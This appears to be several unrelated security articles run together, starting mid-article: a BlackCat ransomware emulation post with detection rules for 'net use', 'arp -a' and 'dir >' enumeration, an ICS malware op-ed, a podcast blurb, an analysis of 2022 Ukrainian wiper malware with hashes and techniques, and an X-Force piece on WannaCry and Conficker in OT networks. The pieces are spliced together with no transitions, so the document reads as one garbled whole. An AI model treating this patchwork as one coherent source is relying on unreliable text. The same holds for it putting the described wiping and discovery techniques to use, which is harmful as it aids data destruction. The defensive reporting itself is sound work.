Scenario 7: System Network Configuration Discovery (T1016): If configured, BlackCat will propagate on a victim’s local network. In order to spread itself to neighbor machines, discovery actions are needed to identify pathways available from the origin host. Network topology data points are obtained with a copy of BlackCat’s network share discovery and MAC address snooping with “arp” commands.

7a. Detection Process

Typically, system enumeration is carried out by using benign, Windows applications. This allows an attacker to gain additional information about the target environment without setting off alarms by using malware or possibly AV flagged software. Since these techniques are utilized by benign Windows processes, the following detections should be taken into account with expected users like network administrators to reduce false positives:

Enumeration through “net” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“net“ OR “net.exe”) AND “use”)
User NOT IN <list of expected net.exe users>

Enumeration through “arp” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (arp -a)
User NOT IN <list of expected network admins>

7b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have an account compromised. To reduce this information disclosure, cmd.exe and powershell.exe should be excluded to only necessary administrative users.

Additionally, Windows command line Audit Process Creation auditing can be enabled to see event ID 4688. Enable the GPO setting to “include command line in process creation events.” Windows CLI events can be filtered and forwarded to a SIEM from all endpoints for further filtering, tuning and correlation for detection of anomalous activity.

Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources that is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed propagation is not enabled, however we included this behavior because it is a configurable option and a tool commonly abused by attackers to achieve various results including moving files over the network and remote process execution.

8a. Detection Process

PsExec is not malicious by nature and is signed by Microsoft as it is a Microsoft published SysInternals tool. This tool may be used maliciously to move laterally on devices within a network, and should be monitored for authorized usage only. If this is not an expected binary in your environment for network administrators to utilize, then we recommend monitoring for this file periodically to see if any have been placed on the system without approved intent. PsExec with alternate credentials specified on the command line is a Logon Type 3+2 event and it should be noted that this passes those credentials in plaintext across the network as well as leaves those credentials vulnerable to theft on the target host. PsExec usage without explicit credentials is a Type 3 Logon event and does not leave any credentials on the target host.

8b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Even legitimate usage of PsExec is still problematic from a security perspective. For the best security, PsExec should be globally banned from execution using Application Control/whitelisting software. Sys Admin or authorized usage of PowerShell Remoting is a much more secure and preferred option for legitimate Type 3 Logons in your environment and does not leave credentials on the target host.

Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.

9a. Detection Process

Searching the file system on Windows machines is typically done through the CLI with the use of the “dir” command. This is typical Windows behavior, but monitoring for this behavior may help identify malicious actions in your environment. Often enumerated behavior on endpoints is sent to a file for exfiltration and examination by the attacker:

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“dir“ AND “>”)

Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.

9b. Mitigation Policies

Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.

Scenario 10: Data Encrypted for Impact (T1486): In our last step of the attack graph, we mimic BlackCat’s encryption method implementing 128-bit AES-NI in CTR mode if supported by the host hardware and falling back to ChaCha20 if not. In addition to the specific encryption algorithm, we also emulate parts of the unique encryption process used by BlackCat.

One of these steps is the use of a temporary checkpoint file written to disk, that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.

Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.

We’ve also taken care to emulate the structure of the file after encryption including an encrypted block of JSON that contains the private key and other metadata required to decrypt the file.

10a. Detection Process

A detection rule could be written to catch the checkpoint file written to disk during the encryption process:

FileName starts_with “checkpoints-”

In addition, Blackcat Ransomware group searches for the following extensions to encrypt:

.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu

Excessive file modifications to a variety of these file extensions within a very short time window would be an indicator of this impact activity occurring in your environment.

10b. Mitigation Policies

MITRE mitigation Recommendations for T1486:

M1040
M1053

In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.

The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017 the same group used ransomware to shutdown servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope and threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s current activity during the current crisis in Ukraine.

Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.

Have you read:Water utility attacked by sophisticated timed malwareEuropean water utility attacked by cryptocurrency mining malwareNo green grid without cybersecurity

Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key factors, such as internal stability through essential services, economic health due to the huge role oil and gas play in many economies, the effects of compliance that can be achieved when crucial suppliers deny or fail to deliver fuel, and finally it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it a fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities were priority efforts, in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, helping decrease the risk to the attacker and increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment leveraged across multiple industries. The desired goal apparently being to interact with that equipment in such a way as to disable safety features, similar to Triton previously discussed above.[5]

Have you read:HBKU and Iberdrola collaborate on smart grid cybersecurityDOE funnels $12m to enhance US energy systems’ cybersecurity

Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.

Third and final, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.

An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google)

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop)

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future)

Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus)

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason)

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN)

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch)

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek)

UNC3524: Eye Spy on Your Email (Mandiant)

Yokogawa CENTUM and ProSafe-RS (CISA)

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)

Executive summary

2022 has experienced an increase in the number of wiper variants targeting Ukrainian entities.
This blog post looks to explain how wipers work, what makes them so effective and provides a short overview of the most recent samples that appeared in the eastern Europe geopolitical conflict.

How does wiper malware work?

Wiper’s main objective is to destroy data from any storage device and make the information unavailable (T1485). There are two ways of removing files, logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle bin, or when it is removed with the command line or terminal with the commands del/rm. This action deletes the pointer to the file but not the file data, making it recoverable with forensic tools as long as the Operative System does not write any other file in the same physical location.

However, malware wipers aim to make the data irrecoverable, so they tend to remove the data from the physical level of the disk. The most effective way to remove the data/file is by overwriting the specific physical location with other data (usually a repeated byte like 0xFF). This process usually involves writing to disk several Gigabytes (or Terabytes) of data and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special files in the system:

The Master Boot Record (MBR), which is used during the boot process to identify where the Operative System is stored in the disk. By replacing the MBR, the boot process crashes, making the files inaccessible unless forensic methodologies are used.
The Master File Table (MFT) is exclusive to NTFS file systems, contains the physical location of files in the drive as well as logical and physical size and any associated metadata. If big files need to be stored in the drive, and cannot use consecutive blocks, these files will have to be fragmented in the disk. The MFT holds the information of where each fragment is stored. Removing the MFT will require the use of forensic tools to recover small files, and basically prevents recovery of fragmented files since the link between fragments is lost.

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of their government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukranian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or an exploitation of an OctoberCMS vulnerability, combined with exploitations of Log4Shell vulnerability (T1190).

defaced Ukrainian website

Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacement, Microsoft Threat Intelligence Center (MSTIC), identified in a report destructive malware samples targeting Ukrainian organizations with two malware samples. Microsoft named the samples WhisperGate, while other security companies labeled the downloader as WhisperGate and WhisperKill as the actual wiper, which was considered a component of WhisperGate.

The identified files were:

Stage1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, deeming the machine unbootable after that point. When booted up, the system displays Figure 2 on screen. Despite the ransom request, the data will not be recoverable since all efforts made by WhisperKill are looking to destroy data, not encrypt it. In this case, the wallet is most probably an attempt to decoy attribution efforts.

wiper ransom note

Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next stage malware (T1102.003) from the Discord app, if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of the file. Then it modifies the file extension to a random four-byte extension. By selecting the file types to be wiped and only writing over the first MB of data, the attackers are optimizing the wiping process. This is due to not wasting time on system files and only spending the necessary time to wipe each file, rapidly switching to the next file as soon as the current one is unrecoverable. Finally, the malware executes a command to delete itself from the system (T1070.004).

HermeticWiper

A month after, on February 23rd 2022, ESET Research reported a new Wiper being used against hundreds of Ukrainian systems. The wiper receives its name from the stolen certificate (T1588.003) it was using to bypass security controls “Hermetica Digital Ltd” (T1588.003). According to a Reuters article, the certificate could have also been obtained by impersonating the company and requesting a certificate from scratch.

hermetica certificate

Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper through the domain, like: domain Group Policy Object (GPO) (T1484.001), Impacket or SMB (T1021.002) and WMI (T1047) with an additional worm component named HermeticWizard.

The wiper component first installs the payload as a service (T1569.002) under C:Windowssystem32Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all the Physical Drives, and then enumerates their partitions. Before attempting to overwrite as much data as the wiper can it will delete key files in the partition, like MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).

On top of deleting key file system structures, it also performs a drive fragmentation (breaking up files and segregating them in the drive to optimize the system’s performance). The combination of the file fragmentation and the deletion of the MFT makes file recovery difficult, since files will be scattered through the drive in small parts – without any guidance as to where each part is located.

Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermaticWiper used the day before.

IsaacWiper identifies all the physical drives not containing the Operative System and locks their logical partitions by only allowing a single thread to access each of them. Then it starts to write random data into the drives in chunks of 64 KB. There is a unique thread per volume, making the wiping process very long.

Once the rest of the physical drives and the logical partitions sharing physical drive with the Operative System’s volume have been wiped, this last volume is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file under the C drive which will be filled with random data until it takes the maximum space it can from the partition, overwriting the already overwritten existing files. This process is performed with a different thread, but it would still take a long time to write the full partition since both concurrent threads are actually attempting to write random data on the full disk.

Isaacwiper strings

Figure 4. IsaacWiper strings.

When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill creators prioritized speed and number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper creators gave total priority to deliver the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine, this time with a different wiper, named AcidRain by SentinelLABS. This wiper was particularly aimed at modems, probably to disrupt Internet access from Ukraine. This new wiper showed similarities to previously seen botnets targeting modems using VPNFilter. It was used in 2018, targeting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting vulnerabilities allowed the attackers to obtain Initial Access inside all types of networks, where the bot would search for Modbus traffic to identify infected systems with Industrial Control Systems (ICS).

The wiper used was the ELF MIPS wiper targeting Viasat KA-SAT modems, which aimed to firstly overwrite any file outside of the any common *nix installation: bin, boot, dev, lib, proc, sbin, sys, sur, etc. to then delete data from /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14 when it was used against a Ukrainian bank. This new wiper variant does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid infecting Domain Controllers in the infected system. Afterwards, it targets C:/Users and any additional attached drive all the way to letter Z:/ and zeroes all the files present in such folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, which has the main functionn being to communicate with industrial equipment. In this case, the wiper was used with the purpose of slowing down the recovery process from the Industroyer2 attack and gaining back control of the ICS consoles, as well as covering the tracks of the attack. According to Welivesecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeliveSecurity. These wipers leverage the shred command if present, otherwise they use the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

doublezero wiper

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukranian entities. These samples approach the attack in very different ways, and most of them occur faster than the time required to respond. For that reason, it is not effective to employ detection of wiper malware, as once they are in the system as it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

SHA256

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

WhisperKill (stage1.exe)

SHA256

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

WhisperKill (stage2.exe)

SHA256

0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da

HermeticWiper

SHA256

1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

HermeticWiper

SHA256

13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033

IsaacWiper

SHA256

9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a

AcidRain

SHA256

47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6

AcidRain

SHA256

Fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa

CaddyWiper

SHA256

7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87

Industroyer2

SHA256

3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe

DoubleZero

SHA256

30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a

DoubleZero

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access

T1190: Exploit Public-Facing Application

TA0002: Execution

T1047: Windows Management Instrumentation
T1569: System Services

T1569.002: Service Execution

TA0008: Lateral Movement

T1021: Remote Services

T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion

T1070: Indicator Removal on Host

T1070.004: File Deletion
T1070.001: Clear Windows Event Logs

T1112: Modify Registry
T1484: Domain Policy Modification

T1484.001: Group Policy Modification

TA0011: Command and Control

T1102: Web Service

T1102.003: One-Way Communication

TA0040: Impact

T1485: Data Destruction
T1499: Endpoint Denial of Service

TA0042: Resource Development

T1588: Obtain Capabilities

T1588.003: Code Signing Certificates

Car-Factory-Professional-Male-Automotive

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — face a more complex challenge than their IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the Eternal Blue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, it provides the ideal environment for even the simplest malware, Conficker included.

From Conficker infections X-Force has observed, the worm is able to affect human machine interfaces (HMIs), which have transmitted network traffic initially alerting security staff of the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
